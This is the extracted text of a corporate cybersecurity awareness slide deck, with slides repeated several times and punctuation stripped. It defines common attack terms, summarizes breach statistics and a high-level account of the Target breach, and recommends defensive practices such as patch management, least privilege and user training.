communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
